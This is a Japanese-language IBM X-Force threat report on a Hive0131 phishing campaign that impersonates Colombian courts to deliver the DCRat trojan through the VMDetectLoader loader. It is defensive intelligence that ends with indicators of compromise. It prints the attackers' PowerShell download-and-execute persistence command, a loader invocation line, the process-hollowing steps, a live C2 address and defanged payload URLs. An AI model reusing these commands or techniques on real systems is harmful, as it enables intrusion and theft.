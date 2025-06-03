タグ
IBM® X-Force Threat Analysis：DCRatのラテン・アメリカにおける存在感拡大

赤いセキュリティーシールドとEメールのグラフィックがキーボード上にカーソルを合わせたノートPCに入力している手

2025年5月初旬、IBM® X-Forceは、Hive0131が、コロンビアの司法機関からのものであると称して、刑事訴訟の電子通知とともにコロンビアのユーザーを対象としたEメール・キャンペーンを実施しているのを発見しました。Hive0131は、おそらく南米を拠点とする金銭目的のグループであり、主にラテン・アメリカ（LATAM）で日常的にキャンペーンを実施し、さまざまなコモディティ・ペイロードを提供しています。現在のキャンペーンは、公式の通信を模倣し、埋め込みリンクまたは埋め込みリンクを含むPDFルアーを含めています。埋め込まれたリンクをクリックすると、感染チェーンがInitiateされ、メモリー内でバンキング型トロイの木馬「DCRat」が実行されます。

DCRatはサービスとしてのマルウェア（MaaS）として運営されており、少なくとも2018年に初めて登場し、ロシアのサイバー犯罪フォーラムで大々的に宣伝され、2カ月のサブスクリプションは約7米ドルで購入できます。DCRatの存在は広く、少なくとも2024年以降、中南米でますます人気が高まっています。2024年の夏にかけて、X-Forceはコロンビアの組織を重点的に標的にしたいくつかのキャンペーンを発見しましたが、すべてメキシコとコロンビアの電子文書エコシステムを専門とするLATAM企業を模倣しています。しかしX-Forceは、感染チェーンとDCRatの配信の違いを考慮して、2024年と現在のキャンペーンは異なる攻撃者によって実施されたと評価しています。2024年に発見されたキャンペーンは、GuLoaderのダウンローダーを実行するために、NSISを含むパスワードで保護されたRARファイルに大きく依存していましたが、最近のキャンペーンは、VMDetectLoaderと名付けた難読化された.NETローダーに依存しています。

DCRatの機能

  • AMSIをバイパスします
  • 分析環境を検出します
  • ブロックリスト化されたプロセスをキックします
  • スケジュールされたタスクまたはレジストリキーを通じて永続性を取得します
  • コマンド・アンド・コントロール（C2）サーバーからのコマンドをリッスンします

DCRatには、以下のタスクを実行できるプラグインが付属していますが、脅威アクターは、追加のタスクを実行するためにカスタム・プラグインを作成する場合があります。

  • コンピューターのマイクまたはカメラを通じて被害者を録音する
  • ファイルのアップロードとダウンロード
  • コマンドの実行
  • システム情報の取得
  • ファイルの暗号化と復号化
  • レジストリキーの編集
  • キーストロークとクリップボード・データのロギング
  • ファイル・システムの操作

脅威の種類

MaaS

分析

2025年5月初旬、X-Forceは、コロンビアのボゴタ民営改善局からのものであると偽るHive0131 Eメール・キャンペーンを発見し、刑事手続きの電子通知を送信しました。発見されたキャンペーンには、TinyURLへのリンクを含むPDFルアーが含まれているか、またはGoogle Docsの場所への埋め込みリンクが含まれています。

感染チェーンの概要 - TinyURLを含むPDF

ミニURLに導くPDFルアーを含むEメールの場合、被害者は1Juzgado 08 Civil Circuito de BoGotá Notificationa Orden de Embargo.Uueという名前のZIPアーカイブにリダイレクトされます。ZIPアーカイブには、無害なファイルと、1Juzzgado 08 Civil Circuito de BoGotá Notificationa Orden de Embargo.jsという名前の悪意のあるJavaScriptファイルが含まれています。JavaScriptファイルは、paste[.]eeサイトからJavaScriptペイロードをダウンロードし、それを実行します。このペイロードは、hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpgからJPGをダウンロードするPowerShellコマンドを実行し、ファイルの最後にbase64でエンコードされたローダーを追加します。実行されると、ローダーはDCRatをダウンロードし、メモリー内で実行します。

このローダーは、サンドボックス環境で実行されているかどうかを判断する機能からVMDetectLoaderという名前が付けられています。分析によると、このローダーはオープンソースプロジェクトhttps://github.com/robsonfelix/VMDetectorを基に開発されていることが判明しました。

RAMA感染チェーン
図1：RAMA感染チェーン
PDFルアー付きのサンプルEメール
図2：PDFルアーEメールのサンプル

感染チェーンの概要 - 埋め込みのGoogle Docsリンク

この感染チェーンは、「CUI 158616000129-2025-10047_122011111777.zip」という名前のパスワードで保護されたZIPアーカイブのGoogle Docsダウンロードへのリンクを含むフィッシングEメールによって開始されます。そのEメールのパスワードは3004です。アーカイブには、バッチ・ファイル・ダウンローダー、CUI 158616000129-2025-10047_122011111777.batが含まれています。hxxp://paste[.]ee/d/jYHEqBJ3/0 ％WinDir％\Temp\Pernambuco.vbsVBSスクリプトはその後、Base64エンコードされたPowerShellスクリプトを復号化して実行し、JPGファイル経由でVMDetectLoaderをダウンロードします。hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
。最終ペイロードは、paste[.]eeを介してVMDetectLoaderによってダウンロードされます。PowerShellスクリプトによって渡されたURL。

Google Docsを使用したRAMA感染チェーン
図3：Google Docsを使用したRAMA感染チェーン
Google Docsリンクが記載されたEメールのサンプル
図4：Google Docsリンクが記載されたEメールのサンプル

VMDetectLoader

VMDetectLoaderは、難読化された.NETローダー（Microsoft.Win32.TaskScheduler.dll）です。これはVirusTotalのhttps://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7で見つけることができます。。ローダーのメタデータを分析すると、このコードはオープンソースプロジェクトhttps://github.com/robsonfelix/VMDetector。

アセンブリの属性：

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

ペイロードを読み込む前に、ローダーは仮想マシンを検知し、VMが検出された場合はホスト属性のリストをコンソールに印刷します。例：

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

機能性

VMDetectLoaderはdnlib.IO.Home.VAI() 次のような関数と渡されたデータを取得しますこの情報はキャンペーンによって異なる場合があります。

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

引数

説明

$storeman

Base64でエンコードされたペイロードがダウンロードされる逆ペーストURL。

MSBuilld

ターゲット注入プロセス

C:\Users\Public\Downloads
rhabdosteus
js

スケジュール済みのタスク作成に使用されるパス：

C:\Users\Public\Downloads\rhabdosteus.js

1

プロセスのチェックを示すフラグ

bimetallism

スケジュールされたタスク名

実行中、VMDetectLoader、XORは必要に応じて参考情報「hIXS」から重要な文字列を復号化します。

フォルダー内の文字列を復号化したサンプル

復号文字列のサンプル

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

永続性

そのように設定されている場合は、JavaScriptペイロードをダウンロードして実行する次のPowerShellコマンドを実行するようにスケジュールされたタスクが作成されます。

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

設定されている場合は、次のコマンドを使用してJavaScriptペイロードを実行する別のタスクを作成することができます。

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

ローダーはペイロードを実行するためにレジストリーのラン・キーを作成する場合もあります。

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

プロセス注入

VMDetectLoaderには、プロセス・ホスティング・インジェクション技術を使用して、さまざまなターゲット・プロセス・インスタンスにペイロードをロードする機能があります。例えば、分析されたキャンペーンの場合、C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit)またはC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-bit)が対象プロセスです。プロセス・インジェクションを担当する関数は、64ビット・サンプルの場合はHackForums.gigajew.x64.Load()、32ビット・サンプルの場合はdnlib.IO.Tools.Ande()という名前です。

ホクラウド・インジェクションのプロセス：

  1. dwCreationFlagsをCREATE_SUSPENDED (4)に設定したCreateProcess()を使用して、中断されたプロセスを作成します。
  2. ZwUnmapViewOfSection()を使用してターゲット・プロセスのメモリーをアンマップします。
  3. VirtualAllocEx()を使用してターゲット・プロセスに新しいメモリーを割り当てます。
  4. WriteProcessMemory()を使用して、新しく割り当てられたメモリーにペイロードを書き込みます。
  5. GetThreadContext()SetThreadContext()を使用して、プロセスのエントリー・ポイントを更新します。
  6. ResumeThread()を実行してコードを実行します。

DCRat

VMDetectLoaderが安全な環境で実行されていると判断した場合、最終ペイロードはプロセス・ホライズンを介してロードされます。このインスタンスでは、最終ペイロードは、次の構成データを持つDCRatです。

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

まとめ

X-Forceは、ラテン・アメリカの脅威環境で活動し、金銭的利益を目的としてMaaSを提供するEメール・キャンペーンを実施するいくつかのグループを追跡しています。追跡されているグループには、Grandorieroバンキング型トロイの木馬の配信に重点を置いたHive0148とHive0149、AdwinとSambaSpyマルウェアを配信するHive0153、およびHive0131があります。Hive0131は通常、QuasarRATやNjRATなどのマルウェアの配布によるオペレーションに焦点を当てていますが、X-ForceはDCRatを関与させるキャンペーンの増加を発見しています。LATAM内のユーザーにバンキング・マルウェアを着実かつ継続的に発見していることから、IBM® X-Forceは、ラテン・アメリカが、ユーザー認証情報やその他の機密情報を入手しようとするフィッシング・キャンペーンを通じてバンキング型トロイの木馬を展開しようとする攻撃者からの標的に直面し続けるだろうと予測しています。

推奨事項

ラテン・アメリカの企業は、添付ファイル、リンク、またはプロンプト・ファイルのダウンロードを含むEメールに注意を払うことが推奨されています。さらに、事業体は以下を実行することが推奨されます。

  • リンクやダウンロード・プロンプトを含むメールに注意する
  • プロセス・インジェクション、不正プロセスの作成、スケジュールされたタスクの作成、レジストリーの変更など、ホスト・ベースの証拠を監視する
  • エンドポイント・セキュリティー・ソフトウェアをインストール、更新、および構成する
  • エンドポイントルールを監視する。
  • 実行ポリシー・バイパスを探索する

侵害の兆候

分類

インジケーター・タイプ

コンテキスト

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

SHA256

キャリア・ファイル

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

SHA256

ZIPアーカイブ

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

SHA256

DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

SHA256

 Obfuscated .NET Loader

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

SHA256

ZIPアーカイブ

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

SHA256

PSスクリプト

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

SHA256

PSスクリプト

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

SHA256

バッチ・スクリプト・ダウンローダー

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

URL

埋め込みPDFリンク

hxxp://paste[.]ee/d/bx699sF9/0

URL

ペイロード・ダウンロードURL

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

URL

埋め込みEメール・リンク

hxxp://paste[.]ee/d/jYHEqBJ3/0

URL

ペイロード・ダウンロードURL

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

URL

JPGダウンロードURL

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

URL

JPGダウンロードURL

IBM® X-Force Premier Threat Intelligenceは、OpenCTIと統合され、この脅威アクティビティーやその他に関して、実用的な脅威インテリジェンスを提供しています。脅威アクター、マルウェア、業種のリスクについてのインサイトにアクセスしましょう。OpenCTI Connectorをインストールし、IBM® X-Forceの専門知識を活用して、検知、対応、サイバーセキュリティーを強化してください。一歩先へ進むために、今すぐ統合しましょう

